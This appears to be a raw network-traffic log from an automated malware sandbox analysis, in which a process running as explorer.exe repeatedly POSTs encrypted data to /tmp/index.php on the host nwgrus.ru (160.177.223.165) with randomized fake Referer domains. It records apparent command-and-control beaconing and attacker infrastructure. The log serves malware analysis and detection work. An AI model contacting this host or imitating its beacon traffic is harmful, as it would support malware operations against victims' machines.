                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.661260160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:30.614135027 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://uajyyjejyvvbvl.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 110
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:30.614164114 CEST110OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 31 22 e0 92
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu1"lv~kpc
                                                                                                                          Oct 8, 2024 18:23:31.471081972 CEST137INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:31 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.661270160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:31.481729031 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://fcbqaeiodmerjjce.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 250
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:31.481729031 CEST250OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7c 00 fd a8
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu|LRdyTPS>rf#jLTgDLCb_UGou2XID(,Smc;@D}uG&yCfh!
                                                                                                                          Oct 8, 2024 18:23:32.360177994 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:32 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.661279160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:32.370985031 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://uqyhewsqgme.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 129
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:32.371001005 CEST129OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 50 1a be e8
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuPt SYze^yS=wl@
                                                                                                                          Oct 8, 2024 18:23:33.234069109 CEST137INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:33 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.661297160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:35.327059984 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://mcnivsvqoyuiyi.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 197
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:35.327059984 CEST197OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4c 02 a7 af
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuLI%wE{Jv#f`Ad"|KZ@_U>Q2>D%0,+wA*s,l-3Xvl
                                                                                                                          Oct 8, 2024 18:23:36.223494053 CEST137INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:36 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.661302160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:36.233551979 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://snlvxdcuggcgtr.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 166
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:36.233597994 CEST166OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 3a 44 bd e1
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu:DZXEFf'm~4hfh,?AVdWTD>780Z/1"d2`
                                                                                                                          Oct 8, 2024 18:23:37.095662117 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:36 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.661308160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:37.103588104 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://rcayuliatuydngjp.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 234
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:37.103601933 CEST234OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 7b 58 c5 ae
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu{XX_Q[P4`DWhyrsPR:`Y5`/0,R]:a)goRW%3rzzDIsY#y|Eg!V0
                                                                                                                          Oct 8, 2024 18:23:38.048799992 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:37 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.661315160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:38.059118032 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://gxhoywsjvhdimib.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 253
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:38.059129953 CEST253OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 38 45 c7 eb
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu8E@c+YBqbfMKkSo82HBHVjY,0{i'''V:/@S3A|yAOYR@kG10(+
                                                                                                                          Oct 8, 2024 18:23:38.938122034 CEST137INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:38 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.661321160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:38.954802990 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://hnkujwopesopy.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 158
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:38.954817057 CEST158OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 23 3f e7 a8
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu#?adQbrFx8wh@C^R*G(dlC?F_P7X
                                                                                                                          Oct 8, 2024 18:23:40.657196999 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:39 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                          Oct 8, 2024 18:23:40.658646107 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:39 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                          Oct 8, 2024 18:23:40.659202099 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:39 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.661327160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:40.985582113 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://gcsggiqiypjqctoh.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 166
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:40.985654116 CEST166OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 78 4f f9 9b
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuxOH_k]Bf`IAL-4YkA[w=J?N1=BRNT?sh
                                                                                                                          Oct 8, 2024 18:23:41.860126019 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:41 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
